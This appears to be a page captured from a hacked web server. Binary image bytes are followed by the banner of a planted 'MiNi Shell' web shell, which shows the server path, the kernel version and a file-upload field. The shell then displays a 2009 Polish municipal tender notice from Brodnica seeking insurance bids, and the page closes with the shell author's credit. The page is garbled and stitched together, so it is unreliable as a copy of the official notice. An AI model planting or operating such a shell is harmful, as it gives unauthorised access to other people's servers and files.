JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090814/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090814/134103-N-2009.html

<p class="kh_header"><b>Brodnica: Ubezpieczenie mienia od ognia i innych zdarzeń losowych, mienia od kradzieży, sprzętu elektronicznego od wszystkich ryzyk, odpowiedzialności cywilnej, szyb od stłuczenia, następstw nieszczęśliwych wypadków, komunikacyjne (OC, NNW, AC, ASS), ubezpieczenie jednostek pływających, ubezpieczenie następstw nieszczęśliwych wypadków dzieci, młodzieży oraz personelu w placówkach oświatowych, ubezpieczenie odpowiedzialności cywilnej personelu w placówkach oświatowych</b><br>
<b>Numer ogłoszenia: 134103 - 2009; data zamieszczenia: 14.08.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Miasta Brodnicy , ul. Kamionka 23, 87-300 Brodnica, woj. kujawsko-pomorskie, tel. 056 4930300, faks 056 4982626.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.brodnica.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Ubezpieczenie mienia od ognia i innych zdarzeń losowych, mienia od kradzieży, sprzętu elektronicznego od wszystkich ryzyk, odpowiedzialności cywilnej, szyb od stłuczenia, następstw nieszczęśliwych wypadków, komunikacyjne (OC, NNW, AC, ASS), ubezpieczenie jednostek pływających, ubezpieczenie następstw nieszczęśliwych wypadków dzieci, młodzieży oraz personelu w placówkach oświatowych, ubezpieczenie odpowiedzialności cywilnej personelu w placówkach oświatowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje ubezpieczenie mienia i odpowiedzialności  Zamawiającego w zakresie ubezpieczenia mienia od ognia i innych zdarzeń losowych, ubezpieczenia mienia od kradzieży, ubezpieczenia sprzętu elektronicznego od wszystkich ryzyk, ubezpieczenia odpowiedzialności cywilnej, ubezpieczenia szyb od stłuczenia, ubezpieczenia następstw nieszczęśliwych wypadków, ubezpieczeń komunikacyjnych, ubezpieczeń jednostek pływających, ubezpieczenia następstw nieszczęśliwych wypadków dzieci, młodzieży oraz personelu w placówkach oświatowych, ubezpieczenia odpowiedzialności cywilnej personelu w placówkach oświatowych w następujących jednostkach organizacyjnych:
a)	Urząd Miejski, ul. Kamionka 23; 87-300 Brodnica REGON 000523413 NIP 874-10-01-480
b)	Szkoła Podstawowa nr 1, ul. 3 Maja 2; 87-300 Brodnica REGON 000255651 NIP 874-10-15-938
c)	Przedszkole nr 9, ul. Wyspiańskiego 12A; 87-300 Brodnica REGON 870524979 NIP 874-10-57-753
                       - ul. Wyspiańskiego 13; 87-300 Brodnica
d)	Przedszkole nr 8, ul. Zielona 3; 87-300 Brodnica REGON 870524962 NIP 874-10-10-869
e)	Przedszkole nr 6, ul. Batalionów Chłopskich 28; 87-300 Brodnica REGON 870524956 NIP 874-10-10-852
f)	Gimnazjum nr 1, ul. Wiejska 6; 87-300 Brodnica REGON 340031313 NIP 874-16-81-138
g)	Szkoła Podstawowa nr 4, ul. Nowa 34; 87-300 Brodnica REGON 000257325 NIP 874-10-15-944
h)	Przedszkole Niepubliczne, ul. Kamionka 16; 87-300 Brodnica REGON 340469765 NIP 874-124-55-84
i)	Szkoła Podstawowa nr 2, ul. Kolejowa 62; 87-300 Brodnica REGON 001223943 NIP 874-10-33-824
j)	Poradnia Rodzinna, ul. Św. Jakuba 22; 87-300 Brodnica REGON 340481447 NIP 874-173-04-63
- Ośrodek wypoczynkowy dla dzieci i młodzieży w Cichem
k)	Zespół Szkół nr 1, ul. Matejki 5; 87-300 Brodnica REGON 870018785 NIP 874-12-93-815
Pozostałe lokalizacje:
a)	Place zabaw na terenie Gminy Miasta Brodnicy
b)	Boiska sportowe, obiekty sportowe i kulturalno-rekreacyjne, baseny
c)	Szatnie, stołówki
- ubezpieczenie mienia 
- ubezpieczenie od ognia 
- ubezpieczenie odpowiedzialności cywilnej ogólnej 
- ubezpieczenie pojazdów mechanicznych od odpowiedzialności cywilnej 
- ubezpieczenie następstw nieszczęśliwych wypadków
- ubezpieczenie Autocasco 
- ubezpieczenie Assistance 
- ubezpieczenie odpowiedzialności cywilnej posiadacza/użytkownika jachtu i/lub sprzętu wodnego 
- jacht casco 
- NNW kierownika i członków załogi 
        UWAGA: Szczegółowy opis przedmiotu zamówienia zawarty jest w Dodatku nr 3 - Program Ubezpieczenia
        UWAGA: Wymagania określone przez Zamawiającego dotyczące przedmiotu zamówienia:
a)	Wykonawca musi udzielać pełnomocnikowi Zamawiającego - Maximus Broker Sp. z o.o. ul. Szosa Chełmińska 164, 87-100 Toruń informacji na temat bieżącej likwidacji szkód Zamawiającego.
b)	Wykonawca działający w formie towarzystwa ubezpieczeń wzajemnych musi posiadać statut, w którego wynika, że towarzystwo będzie ubezpieczało także osoby nie będące członkami towarzystwa. Zamawiający (jednostki Zamawiającego) będzie traktowany przez takiego Wykonawcę jako osoba nie będąca członkiem towarzystwa, a co za tym idzie nie będzie zobowiązany do udziału w pokrywaniu strat towarzystwa przez wnoszenie dodatkowej składki, zgodnie z art. 44 ust. 2 Ustawy o działalności ubezpieczeniowej.
c)	Wykonawca musi posiadać ogólne (szczególne) warunki wszystkich ubezpieczeń określonych w przedmiocie zamówienia..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 66.51.00.00-8, 66.51.52.00-5, 66.51.51.00-4, 66.51.64.00-4, 66.51.61.00-1, 66.51.21.00-3, 66.51.41.10-0, 66.51.93.00-4, 66.51.63.00-3, 66.51.41.50-2, 66.51.21.00-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się wyłącznie Wykonawcy, którzy spełniają określone przez Zamawiającego warunki tj.:
1)	posiadają uprawnienia do wykonywania działalności ubezpieczeniowej,
2)	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia,
3)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, 
4)	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia,


Ocena spełnienia w/w warunków  dokonana zostanie  zgodnie z formułą spełnia - nie spełnia w oparciu  o informacje zawarte  w dokumentach i oświadczeniach wymienionych w pkt. 9 specyfikacji istotnych warunków zamówienia. Z treści  załączonych dokumentów  musi wynikać  jednoznacznie, iż w/w warunki wykonawca spełnia.  
Nie spełnienie chociażby jednego warunku, skutkować będzie wykluczeniem Wykonawcy z postępowania..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Wymagane niżej wymienione dokumenty należy przedstawić w formie oryginałów albo kserokopii. Dokumenty złożone w formie kserokopii nie potwierdzonych notarialnie muszą być opatrzone klauzulą ZA ZGODNOŚĆ Z ORYGINAŁEM i poświadczone za zgodność z oryginałem przez wykonawcę.

Lp.	Warunek do spełnienia przez wykonawcę	Dokument potwierdzający spełnienie warunku	Uwagi
1.	Posiadanie uprawnień do wykonywania działalności ubezpieczeniowej	Kopia dokumentu potwierdzającego posiadanie uprawnień do prowadzenia działalności ubezpieczeniowej, o którym mowa w art. 6 ust. 1 ustawy z dnia 22 maja 2003 roku o działalności ubezpieczeniowej (Dz. U. z 2003 r. Nr 124, poz. 1151 z późn. zm.)	Dokument ten będzie stanowić załącznik do oferty
		Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 m-cy przed upływem terminu  składania oferty	Dokument ten będzie stanowić załącznik do oferty
2	Spełnianie warunków udziału w postępowaniu i nie podleganie wykluczeniu z udziału w postępowaniu	Oświadczenie o spełnianiu warunków udziału w postępowaniu o udzielenie zamówienia publicznego zgodnie z art. 22 Uzp  oraz o niepodleganiu wykluczeniu na podstawie art. 24 Uzp;
	Dokument ten będzie stanowić załącznik do oferty, wg załączonego wzoru                   Oświadczenie nr 1
3.	Pełnomocnictwo dla osoby podpisującej ofertę, jeżeli umocowanie nie wynika z KRS bądź dokumentu równorzędnego	Pełnomocnictwo	Dokument ten będzie stanowić załącznik do oferty

W przypadku wnoszenia oferty wspólnej przez dwa podmioty lub więcej podmiotów gospodarczych każdy z nich musi spełniać warunki udziału w postępowaniu, o których mowa w art. 22 ust. 1, pkt 1-4 ustawy, oraz nie może podlegać wykluczeniu z postępowania na podstawie art. 24 ustawy - każdy z podmiotów występujących wspólnie musi złożyć dokumenty potwierdzające spełnienie warunków udziału w postępowaniu. Oferta złożona przez podmioty występujące wspólnie musi zawierać pełnomocnictwo dla podmiotu reprezentującego wszystkie podmioty występujące wspólnie. 

Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej przedstawia dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzający, że nie otwarto jego likwidacji ani nie ogłoszono upadłości. 
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentu, o którym mowa powyżej zastępuje się go dokumentem   zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://bip.brodnica.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Brodnicy, ul. Kamionka 23, 87-300 Brodnica w pokoju 207.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.08.2009 godzina 10:10, miejsce: Urząd Miejski w Brodnicy, ul. Kamionka 23, 87-300 Brodnica w pokoju 211 (kancelaria ogólna) lub droga pocztową na adres siedziby Zamawiającego.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Ubezpieczenie mienia od ognia i innych zdarzeń losowych, mienia od kradzieży, sprzętu elektronicznego od wszystkich ryzyk, odpowiedzialności cywilnej, szyb od stłuczenia, następstw nieszczęśliwych wypadków, komunikacyjne (OC, NNW, AC, ASS), ubezpieczenie jednostek pływających, ubezpieczenie następstw nieszczęśliwych wypadków dzieci, młodzieży oraz personelu w placówkach oświatowych, ubezpieczenie odpowiedzialności cywilnej personelu w placówkach oświatowych.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ubezpieczenie mienia od ognia i innych zdarzeń losowych,
Ubezpieczenie mienia od kradzieży,
Ubezpieczenie sprzętu elektronicznego od wszystkich ryzyk,
Ubezpieczenie odpowiedzialności cywilnej,
Ubezpieczenie szyb od stłuczenia,
Ubezpieczenie następstw nieszczęśliwych wypadków
Ubezpieczenia komunikacyjne (OC, NNW, AC, ASS).</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 66.51.00.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2012.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Zaakceptowanie klauzul dodatkowych - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Ubezpieczenie mienia od ognia i innych zdarzeń losowych, mienia od kradzieży, sprzętu elektronicznego od wszystkich ryzyk, odpowiedzialności cywilnej, szyb od stłuczenia, następstw nieszczęśliwych wypadków, komunikacyjne (OC, NNW, AC, ASS), ubezpieczenie jednostek pływających, ubezpieczenie następstw nieszczęśliwych wypadków dzieci, młodzieży oraz personelu w placówkach oświatowych, ubezpieczenie odpowiedzialności cywilnej personelu w placówkach oświatowych.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ubezpieczenie jednostek pływających.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 66.51.00.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 25.05.2013.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Ubezpieczenie mienia od ognia i innych zdarzeń losowych, mienia od kradzieży, sprzętu elektronicznego od wszystkich ryzyk, odpowiedzialności cywilnej, szyb od stłuczenia, następstw nieszczęśliwych wypadków, komunikacyjne (OC, NNW, AC, ASS), ubezpieczenie jednostek pływających, ubezpieczenie następstw nieszczęśliwych wypadków dzieci, młodzieży oraz personelu w placówkach oświatowych, ubezpieczenie odpowiedzialności cywilnej personelu w placówkach oświatowych.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ubezpieczenie następstw nieszczęśliwych wypadków dzieci, młodzieży oraz personelu w placówkach oświatowych,
 Ubezpieczenie odpowiedzialności cywilnej personelu w placówkach oświatowych..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 66.51.00.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2012.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 10</li>
<li>2. Wysokość sumy ubezpieczenia - 60</li>
<li>3. Zaakceptowanie klauzul dodatkowych - 30</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com